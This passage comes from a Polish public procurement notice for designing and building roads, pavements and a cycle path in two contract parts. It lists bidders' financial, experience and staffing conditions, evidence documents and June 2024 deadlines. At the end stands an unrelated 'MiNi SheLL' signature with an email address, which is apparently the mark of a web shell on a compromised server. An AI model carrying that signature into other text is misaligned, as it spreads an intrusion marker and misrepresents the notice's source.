1.250.000,00 zł (słownie: jeden miliom dwieście pięćdziesiąt tysięcy złotych ), <br/>co potwierdzą poprzez złożenie aktualnej informacji banku. <br/>Jeżeli wykonawca składa ofertę na dwie Części powinien posiadać środki w wysokości 2.350.000,00 złotych.<br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie oświadczenia wg załącznika Nr 2 i dokumentów złożonych przez wykonawcę z banku lub SKOK, na zasadzie spełnia/nie spełnia.<br/><br/><br/><br/>2) Zdolności technicznej lub zawodowej tj. <br/>a) doświadczenie :<br/>posiadają doświadczenie umożliwiające realizację zamówienia tzn. w okresie ostatnich siedmiu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej :<br/>	dla Części Nr 1 : dwie usługi projektowe polegające na sporządzeniu kompletnej dokumentacji projektowej na wykonanie budowy lub przebudowy drogi publicznej co najmniej klasy D i kategorii KR2 o nawierzchni jezdni asfaltowej o wartości każdej zaprojektowanej inwestycji min. 1.000.000 zł brutto, dla których wydano ostateczną decyzję o pozwoleniu na budowę lub PINB nie wniósł zastrzeżeń do zgłoszenia o zamiarze rozpoczęcia wykonywania robót,<br/>	dla Części Nr 1 : dwie roboty budowlane polegające na budowie lub przebudowie drogi publicznej co najmniej klasy D i kategorii KR2 o nawierzchni jezdni asfaltowej o wartości każdej z robót budowlanych min. 1.000.000 zł brutto, dla których PINB nie wniósł zastrzeżeń do wykonanych robót,<br/>	dla Części Nr 2 : dwie usługi projektowe polegające na sporządzeniu kompletnej dokumentacji projektowej na wykonanie budowy drogi publicznej lub ścieżki rowerowej lub chodnika o nawierzchni z kostki betonowej lub kamiennej o wartości każdej zaprojektowanej inwestycji min. 1.500.000 zł brutto, dla których wydano ostateczną decyzję o pozwoleniu na budowę lub PINB nie wniósł zastrzeżeń do zgłoszenia o zamiarze rozpoczęcia wykonywania robót,<br/>	dla Części Nr 2 : dwie roboty budowlane polegające na wykonaniu budowy drogi publicznej lub ścieżki rowerowej lub chodnika o nawierzchni wykonanej z kostki betonowej lub kamiennej o wartości każdej z robót budowlanych min. 1.500.000 zł brutto, dla których wydano ostateczną decyzję o pozwoleniu na użytkowanie lub PINB nie wniósł zastrzeżeń do wykonanych robót.<br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie złożonego oświadczenia wg załącznika Nr 2 oraz wykazu wykonanych usług projektowych i wykonanych robót budowlanych wraz z dokumentami potwierdzającymi należyte wykonanie.<br/>Jeżeli wykonawca zamierza potwierdzić spełnianie warunku dokumentami wystawionymi dla konsorcjum, w którym był partnerem, z treści referencji lub innych dokumentów musi wynikać, jakie usługi lub roboty i o jakiej wartości były wykonane przez wykonawcę składającego ofertę.<br/><br/>b) Osób zdolnych do wykonania zamówienia.<br/>Dla Części Nr 1 dysponują :<br/> projektantem branży drogowej – posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do projektowania w specjalności drogowej, lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tych specjalnościach oraz minimum 5 lat doświadczenia w projektowaniu (licząc od daty uzyskania uprawnień),<br/>	projektantem robót telekomunikacyjnych posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do projektowania w specjalności telekomunikacyjnej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane do projektowania w tych specjalnościach oraz minimum 5 lat doświadczenia w projektowaniu (licząc od daty uzyskania uprawnień),<br/> kierownikiem budowy posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności drogowej lub konstrukcyjno – budowlanej bez ograniczeń lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tej specjalności oraz minimum 5 lat doświadczenia w (licząc od daty uzyskania uprawnień), w tym w kierowaniu budową drogi o nawierzchni jezdni asfaltowej o wartości min. 1.000.000 zł brutto,<br/> kierownikiem robót telekomunikacyjnych posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności telekomunikacyjnej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tych specjalnościach oraz minimum 5 lat doświadczenia w kierowaniu robotami budowlanymi jako kierownik robót/budowy (licząc od daty uzyskania uprawnień).<br/><br/>Dla Części Nr 2 dysponują :<br/> projektantem branży drogowej – posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do projektowania w specjalności drogowej, lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tych specjalnościach oraz minimum 5 lat doświadczenia w projektowaniu (licząc od daty uzyskania uprawnień),<br/>	projektantem robót telekomunikacyjnych posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do projektowania w specjalności telekomunikacyjnej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane do projektowania w tych specjalnościach oraz minimum 5 lat doświadczenia w projektowaniu (licząc od daty uzyskania uprawnień),<br/>	projektantem robót sanitarnych posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do projektowania w specjalności instalacyjnej w zakresie sieci, wodociągowych i kanalizacyjnych lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tych specjalnościach oraz minimum 5 lat doświadczenia w projektowaniu (licząc od daty uzyskania uprawnień). <br/> kierownikiem budowy posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności drogowej lub konstrukcyjno – budowlanej bez ograniczeń lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tej specjalności oraz minimum 5 lat doświadczenia w (licząc od daty uzyskania uprawnień), w tym w kierowaniu budową drogi lub ścieżki rowerowej lub chodnika z kostki betonowej lub kamiennej o wartości inwestycji min. 1.500.000 zł brutto,<br/> kierownikiem robót telekomunikacyjnych posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności telekomunikacyjnej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tych specjalnościach oraz minimum 5 lat doświadczenia w kierowaniu robotami budowlanymi jako kierownik robót/budowy (licząc od daty uzyskania uprawnień),<br/>	kierownikiem robót sanitarnych posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, wodociągowych i kanalizacyjnych lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tych specjalnościach oraz minimum 5 lat doświadczenia w kierowaniu robotami budowlanymi jako kierownik robót/budowy (licząc od daty uzyskania uprawnień). <br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie złożonego oświadczenia wg załącznika Nr 2 oraz wykazu zdolnych do wykonania zamówienia, na zasadzie spełnia/nie spełnia.<br/>Jeżeli wykonawca składa ofertę na dwie części zamówienia powinien dysponować co najmniej jednym zespołem projektowym i kierowania budową spełniającym wymagania, jak dla części Nr 2<br/>Zamawiający dopuszcza łączenie funkcji pod warunkiem posiadania uprawnień i doświadczenia wymaganego dla danych funkcji, z wyłączeniem kierownika budowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia przez wykonawcę braku podstaw wykluczenia z postępowania, Zamawiający żąda złożenia:<br/>1)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej ( wg załącznika Nr 5 ),<br/>2)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>3) oświadczenia własnego wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: <br/>a)	art. 108 ust. 1 pkt 3 ustawy, <br/>b)	art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, <br/>c)	art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/>d)	art. 108 ust. 1 pkt 6 ustawy,<br/>e)	art. 109 ust. 1 pkt. 5, 7 – 10 ustawy,<br/>f)	art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( Dz. U. z 2023 r. poz. 1497 ).<br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowych środków dowodowych, o których mowa w ppkt. 2 – 3) dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, sytuacji finansowej, Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 7 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane lub usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane lub usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (wg załącznika Nr 7 ),<br/>2)	wykazu usług projektowych wykonanych w okresie ostatnich 7 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy (wg wzoru – załącznik Nr 7 ),<br/>3)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wg załącznika Nr 8 ),<br/>4)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	wspólnie muszą wykazać, że wspólnie spełniają warunki udziału w postępowaniu,<br/>2)	w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane,<br/>3)	w stosunku do żadnego z wykonawców wspólnie ubiegających się o zamówienie nie zachodzi jakakolwiek podstawa do wykluczenia z postępowania na podstawie art. 108 ust. 1, art. 109 ust. 1 pkt. 4, 5, 7, 8, 9, 10 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( Dz. U. z 2023 r. poz. 1497 ze zm. ),<br/>4)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>5)	muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>6)	przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców,<br/>7)	wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie wg załącznika Nr 4, z którego będzie wynikać, które roboty/usługi będą wykonywać poszczególni wykonawcy,<br/>8)	przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzania zawarto w załączniku Nr 6 do SWZ pn. Projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy złożyć do dnia 21.06.2024 r. do godziny 10:00 za pośrednictwem Platformy na adres : https://maszewo.logintrade.net.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-21 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-20</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com